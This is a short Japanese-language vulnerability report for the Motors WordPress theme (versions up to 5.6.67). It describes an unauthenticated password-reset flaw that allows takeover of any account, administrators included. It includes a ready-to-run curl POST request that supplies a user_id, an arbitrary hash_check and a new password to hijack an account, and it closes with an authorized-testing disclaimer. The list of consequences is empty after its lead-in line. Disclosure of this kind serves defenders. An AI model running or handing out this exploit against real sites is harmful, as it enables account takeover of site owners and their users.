
Motors <= 5.6.67 - 認証されていない権限昇格(パスワード更新/アカウント乗っ取りを介した)
Motors WordPressテーマ(バージョン5.6.67までを含む)には、パスワードリセット機能に重大な認証欠陥があります。
このテーマは、エンドポイントを介してフロントエンドのパスワード更新メカニズムを提供しますが、パスワード変更を処理する前にユーザーIDや権限を適切に検証しません。
その結果、認証されていない攻撃者は、user_id、任意のhash_check、新しいパスワード(stm_new_password)を提供する巧みに細工されたHTTPリクエストを送信し、管理者を含む任意のユーザーのパスワードをリセットできます。
悪用された場合、攻撃者は以下が可能になります:
この欠陥は、ログインを必要とせず、ログを監視しない限り痕跡が残りにくいため、特に危険です。
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
このレポートは教育および許可されたセキュリティテスト目的のみです。
許可なくこの脆弱性を悪用すると、法的および倫理的境界を越える可能性があります。